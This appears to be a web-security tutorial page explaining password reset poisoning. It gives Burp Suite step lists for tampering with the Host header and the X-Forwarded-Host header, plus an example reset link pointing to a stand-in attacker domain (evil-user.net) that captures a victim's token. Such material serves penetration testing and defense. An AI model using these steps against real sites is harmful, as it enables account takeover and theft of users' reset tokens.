Password Reset Poisoning

Introduction

It is common for password reset functionality to include the Host header value when creating password reset links that use a generated secret token. If the application processes an attacker-controlled domain to create a password reset link, the victim may click on the link in the email and allow the attacker to obtain the reset token, thus resetting the victim’s password.

Constructing a Password Reset Poisoning Attack

If the URL that is sent to the user is dynamically generated based on controllable input, such as the Host header, it may be possible to construct a password reset poisoning attack as follows:

  1. The attacker obtains the victim's email address or username, as required, and submits a password reset request on their behalf. When submitting the form, they intercept the resulting HTTP request and modify the Host header so that it points to a domain that they control. For this example, we'll use evil-user.net.

  2. The victim receives a genuine password reset email directly from the website. This seems to contain an ordinary link to reset their password and, crucially, contains a valid password reset token that is associated with their account. However, the domain name in the URL points to the attacker's server:

    https://evil-user.net/reset?token=0a1b2c3d4e5f6g7h8i9j

  3. If the victim clicks this link (or it is fetched in some other way, for example, by an antivirus scanner) the password reset token will be delivered to the attacker's server.

  4. The attacker can now visit the real URL for the vulnerable website and supply the victim's stolen token via the corresponding parameter. They will then be able to reset the user's password to whatever they like and subsequently log in to their account.

Basic Password Reset Poisoning

  • Click on the forgot password link and provide the victim username and click on submit

  • In the burp proxy send the captured /forgot-password request to repeater

  • Change the Host header website the the attacker website (Example: burp collaborator url)

  • Send the request

  • Now when the victim clicks on the link you should get a reset token in the burp collaborator window

  • Now copy the reset token and send it using the valid website domain and required parameters

  • You should be able to change the password of the victim user to a new password

Password Reset Poisoning via Middleware

In this attack since the Host header is not modifiable, we used X-Forwarded-Host to bypass this mitigation

  • Click on the forgot password link and provide the victim username and click on submit

  • In the burp proxy send the captured /forgot-password request to repeater

  • Add a new header called X-Forwarded-Host and assign a value as the attacker controlled domain (Example: burp collaborator url)

  • Send the request

  • Now when the victim clicks on the link you should get a reset token in the burp collaborator window

  • Now copy the reset token and send it using the valid website domain and required parameters

  • You should be able to change the password of the victim user to a new password

REFERENCES

PreviousTesting for VulnerabilityNextWeb Cache Poisoning

Last updated